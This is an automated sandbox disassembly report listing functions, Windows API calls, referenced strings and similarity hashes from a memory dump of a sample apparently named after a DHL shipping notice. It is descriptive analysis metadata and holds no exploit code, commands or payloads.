Function 0093AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0095F910), ref: 0093AB76
GetDriveTypeW.KERNEL32(00000061,0098A620,00000061), ref: 0093AC40
_wcscpy.LIBCMT ref: 0093AC6A

Strings

ramdisk, xrefs: 0093ABEA
fixed, xrefs: 0093ABBE
unknown, xrefs: 0093AC01
cdrom, xrefs: 0093AB92
all, xrefs: 0093AB7C
removable, xrefs: 0093ABA8
network, xrefs: 0093ABD4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 45280b8ad8d603025d107cc81811377d91e71925df0742f57a4b8dc59b1f593e
Instruction ID: f3da8230815c4fb4ddfb50f7bfa166cf5d31fbb939ea40ef5b41e0e1955d8c6a
Opcode Fuzzy Hash: 45280b8ad8d603025d107cc81811377d91e71925df0742f57a4b8dc59b1f593e
Instruction Fuzzy Hash: 255199301083059FC720EF28C891AAEB7A9FF91304F10492AF4D6972A2EB359D49CB53

Function 008D9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 008D99C2
__swprintf.LIBCMT ref: 008D9A0C
__i64tow.LIBCMT ref: 0090FA0F

Strings

False, xrefs: 0090F9D7
%.15g, xrefs: 008D9A06
0x%p, xrefs: 0090F9F1
True, xrefs: 0090F9D0

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 5125e823ac2fe65c845b874e579abfb2cf8655490747859ad3c1c5321f96b9ed
Instruction ID: b5cb0fb94b00cd52971abd8eae64cc580988c75daadd93aa8b48d5ce5b0c08cc
Opcode Fuzzy Hash: 5125e823ac2fe65c845b874e579abfb2cf8655490747859ad3c1c5321f96b9ed
Instruction Fuzzy Hash: 9D41F271604209BEEB34AB38D852F7A77E8FB44304F20456FE689D7391EE3199418B12

Function 009573C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009573D9
CreateMenu.USER32 ref: 009573F4
SetMenu.USER32(?,00000000), ref: 00957403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00957490
IsMenu.USER32(?), ref: 009574A6
CreatePopupMenu.USER32 ref: 009574B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009574DD
DrawMenuBar.USER32 ref: 009574E5

Strings

F, xrefs: 009574D1
0, xrefs: 009573CF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 4ee17ec899e79d31822ad28f39cbfef396cff8857683bce66e593686b1d4846d
Instruction ID: 7e1c30c7c52951f28f24f3d440d45074c3dcdd390505862432e48b058cf34ea0
Opcode Fuzzy Hash: 4ee17ec899e79d31822ad28f39cbfef396cff8857683bce66e593686b1d4846d
Instruction Fuzzy Hash: 2E416A74A04205EFDB10DFAAE884EAABBFAFF49351F140429FD0597360D730AA14DB50

Function 0095772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009577CD
CreateCompatibleDC.GDI32(00000000), ref: 009577D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009577E7
SelectObject.GDI32(00000000,00000000), ref: 009577EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 009577FA
DeleteDC.GDI32(00000000), ref: 00957803
GetWindowLongW.USER32(?,000000EC), ref: 0095780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00957821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0095782D

Strings

static, xrefs: 00957765

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 337d4a1737100f9ec8bc6f8c37f32933c4e017e917c49e704a051e569f744462
Instruction ID: 6c468aa79ffa58a1329e084202f6026935e123e68e016afa7a056191bdfdc5de
Opcode Fuzzy Hash: 337d4a1737100f9ec8bc6f8c37f32933c4e017e917c49e704a051e569f744462
Instruction Fuzzy Hash: BA319C32119214ABDF119FA6EC18FDA3B6DEF0D332F100224FA15920A0C7319815EBA4

Function 008F7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008F707B

Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68

__gmtime64_s.LIBCMT ref: 008F7114
__gmtime64_s.LIBCMT ref: 008F714A
__gmtime64_s.LIBCMT ref: 008F7167
__allrem.LIBCMT ref: 008F71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F71D9
__allrem.LIBCMT ref: 008F71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F720E
__allrem.LIBCMT ref: 008F7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F7243
__invoke_watson.LIBCMT ref: 008F72B4

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: cb98adcfd6d0b827bc88b54009ec6f437519a0cfffd369ceac9761ca5d34408a
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 2D71B671A04B1BABF7149E79CC41B7AB3A8FF54324F14422AFA15D66C1EB70DA508790

Function 00932A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00932A31
GetMenuItemInfoW.USER32(00996890,000000FF,00000000,00000030), ref: 00932A92
SetMenuItemInfoW.USER32(00996890,00000004,00000000,00000030), ref: 00932AC8
Sleep.KERNEL32(000001F4), ref: 00932ADA
GetMenuItemCount.USER32(?), ref: 00932B1E
GetMenuItemID.USER32(?,00000000), ref: 00932B3A
GetMenuItemID.USER32(?,-00000001), ref: 00932B64
GetMenuItemID.USER32(?,?), ref: 00932BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00932BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932C24

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: c8f7d0e87f83840a11aebd60eb2eea37f989a9221ae83be348248a3c963405e8
Instruction ID: c199c4941697658ff36fe33d20d1a1542c982ff397dbf29db4d35d7eeb345305
Opcode Fuzzy Hash: c8f7d0e87f83840a11aebd60eb2eea37f989a9221ae83be348248a3c963405e8
Instruction Fuzzy Hash: CC619DB0914249AFDB21CF64D888EBEBBB8EB41314F140599F841E7251E735AD45EF21

Function 00957192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00957214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00957217
GetWindowLongW.USER32(?,000000F0), ref: 0095723B
_memset.LIBCMT ref: 0095724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0095725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009572D6

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 7336fedc0a3990dbb96a68bf5cdc1caca51f1fa7a7f5872f95f5870299cb1cf1
Instruction ID: ac6f11b6b43193d512bd3aad581d41397b2486c0c6d43ec2be7a75d5269169b6
Opcode Fuzzy Hash: 7336fedc0a3990dbb96a68bf5cdc1caca51f1fa7a7f5872f95f5870299cb1cf1
Instruction Fuzzy Hash: E9618B71904208AFDB10DFA9DC81EEEB7F8EB09710F14015AFE14A72A1D770AE45DBA0

Function 0092710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00927135
SafeArrayAllocData.OLEAUT32(?), ref: 0092718E
VariantInit.OLEAUT32(?), ref: 009271A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 009271C0
VariantCopy.OLEAUT32(?,?), ref: 00927213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00927227
VariantClear.OLEAUT32(?), ref: 0092723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00927249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00927252
VariantClear.OLEAUT32(?), ref: 00927264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0092726F

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 49ce0514f20d76f30559703d9322ba5d2197bb3d960cbe1e959c271365c09b03
Instruction ID: de1e5fe39e6ff30410b9f3df429615becca7f91fa55ed1015bbdc1e413c51073
Opcode Fuzzy Hash: 49ce0514f20d76f30559703d9322ba5d2197bb3d960cbe1e959c271365c09b03
Instruction Fuzzy Hash: 65414135904229EFCF00EFA9D858DAEBBB9FF48355F008069F955E7261CB30A945DB90

Function 00945A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00945AA6
inet_addr.WSOCK32(?,?,?), ref: 00945AEB
gethostbyname.WSOCK32(?), ref: 00945AF7
IcmpCreateFile.IPHLPAPI ref: 00945B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00945B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00945B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00945C00
WSACleanup.WSOCK32 ref: 00945C06

Strings

Ping, xrefs: 00945B29

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 0079a1c9fc787e49b5abfe5928bca08974832850431ade3c135c44b539086d46
Instruction ID: e50c7be3d1dc556383e2263819fabdb752c261b92cbb99a419a13a533a6b2a4e
Opcode Fuzzy Hash: 0079a1c9fc787e49b5abfe5928bca08974832850431ade3c135c44b539086d46
Instruction Fuzzy Hash: 1E5191316187009FD711AF65CC55F2ABBE4EF48720F15892AF556DB2A2DB74EC00DB42

Function 0093B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0093B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0093B7B1
GetLastError.KERNEL32 ref: 0093B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0093B828

Strings

READONLY, xrefs: 0093B7F3
NOTREADY, xrefs: 0093B7E7
READY, xrefs: 0093B801
UNKNOWN, xrefs: 0093B7E0
INVALID, xrefs: 0093B7FA

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: dbd3d59a70ccb4d87171923f78643d462cda26225de34be39ccc7577312b07b5
Instruction ID: d2e8416881b0c4b3c043b22a4d290ca6ecf1c507f54509b98e43e7595cec6d0b
Opcode Fuzzy Hash: dbd3d59a70ccb4d87171923f78643d462cda26225de34be39ccc7577312b07b5
Instruction Fuzzy Hash: 02319335A00209AFDB10EF68C885ABE7BB8FF84754F14412AF602D7391DB759942CF91

Function 00929471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009294F6
GetDlgCtrlID.USER32 ref: 00929501
GetParent.USER32 ref: 0092951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00929520
GetDlgCtrlID.USER32(?), ref: 00929529
GetParent.USER32(?), ref: 00929545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00929548

Strings

ComboBox, xrefs: 0092947E
ListBox, xrefs: 009294B3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 5845f50df6613dd662ee221d49fa8e799e0ef0fbb7bc020be6960917b409539f
Instruction ID: 769943ab54caec7f6ff8059178a641af7aeb5f3aabee278c0e6d40ad7762a3b0
Opcode Fuzzy Hash: 5845f50df6613dd662ee221d49fa8e799e0ef0fbb7bc020be6960917b409539f
Instruction Fuzzy Hash: 70210670A00218BBCF01AB65DC95EFEBBB8FF45310F100116B962972E6DB755919DB20

Function 0092955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009295DF
GetDlgCtrlID.USER32 ref: 009295EA
GetParent.USER32 ref: 00929606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00929609
GetDlgCtrlID.USER32(?), ref: 00929612
GetParent.USER32(?), ref: 0092962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00929631

Strings

ComboBox, xrefs: 00929569
ListBox, xrefs: 0092959E

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 76743fb12b14714d8494e31a151680f3df6ddefbd8b3770442c3b979c23fe272
Instruction ID: d1b709a7c2ac5996ab6bda0355e8b85ed949f506ec1d9463741d04511315c3d6
Opcode Fuzzy Hash: 76743fb12b14714d8494e31a151680f3df6ddefbd8b3770442c3b979c23fe272
Instruction Fuzzy Hash: 3C21D474A00218BBDF01AB65DCD5EFEBBB8FF48310F140116F921972A5DB759919DB20

Function 00929645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00929651
GetClassNameW.USER32(00000000,?,00000100), ref: 00929666
_wcscmp.LIBCMT ref: 00929678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009296F3

Strings

list, xrefs: 009296D5
largeicons, xrefs: 00929687
smallicons, xrefs: 009296BB
details, xrefs: 009296A1
SHELLDLL_DefView, xrefs: 00929672

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: acb8e61dea35252b6bb143b76d1e93f6ebb7c438d13fe359ca41106c0b00a68f
Instruction ID: 9b85fdc53e51227ccee87ac7a825af1438f0b540e1b4abb5cc51f1ec4d3c5137
Opcode Fuzzy Hash: acb8e61dea35252b6bb143b76d1e93f6ebb7c438d13fe359ca41106c0b00a68f
Instruction Fuzzy Hash: 5111067624832BBAFA013635FC1ADB677DCDF05374F200026FE01E50D5FEA5A9505A59

Function 00948BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00948BEC
CoInitialize.OLE32(00000000), ref: 00948C19
CoUninitialize.OLE32 ref: 00948C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00948D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00948E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00962C0C), ref: 00948E84
CoGetObject.OLE32(?,00000000,00962C0C,?), ref: 00948EA7
SetErrorMode.KERNEL32(00000000), ref: 00948EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00948F3A
VariantClear.OLEAUT32(?), ref: 00948F4A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 078895433c47e226ff48036c842008af77756b791e575afb498e5a9ab9a3a815
Instruction ID: c7dd7df549d036c372a96f49be5f59a1f52041313a0dd576c23e1fea4b70dfa5
Opcode Fuzzy Hash: 078895433c47e226ff48036c842008af77756b791e575afb498e5a9ab9a3a815
Instruction Fuzzy Hash: 4FC1F071608305AFC700EF68C88492BB7E9FF89758F00496DF58A9B251DB71ED05CB52

Function 00934189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0093419D
__swprintf.LIBCMT ref: 009341AA

Part of subcall function 008F38D8: __woutput_l.LIBCMT ref: 008F3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 009341D4
LoadResource.KERNEL32(?,00000000), ref: 009341E0
LockResource.KERNEL32(00000000), ref: 009341ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0093420D
LoadResource.KERNEL32(?,00000000), ref: 0093421F
SizeofResource.KERNEL32(?,00000000), ref: 0093422E
LockResource.KERNEL32(?), ref: 0093423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0093429B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 828cf22486969beb7b215c12728f09913f0611109d2ac4daf0654797829a7035
Instruction ID: d5ec9c966c69c508ba9a08144c8d9f814ba61fc9e654edd14841ffbacc5aace1
Opcode Fuzzy Hash: 828cf22486969beb7b215c12728f09913f0611109d2ac4daf0654797829a7035
Instruction Fuzzy Hash: 2431CEB161920AABCB019FA1DC98EBF7BACEF04311F014425F925E2150E734EA519BA1

Function 009316DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00931700
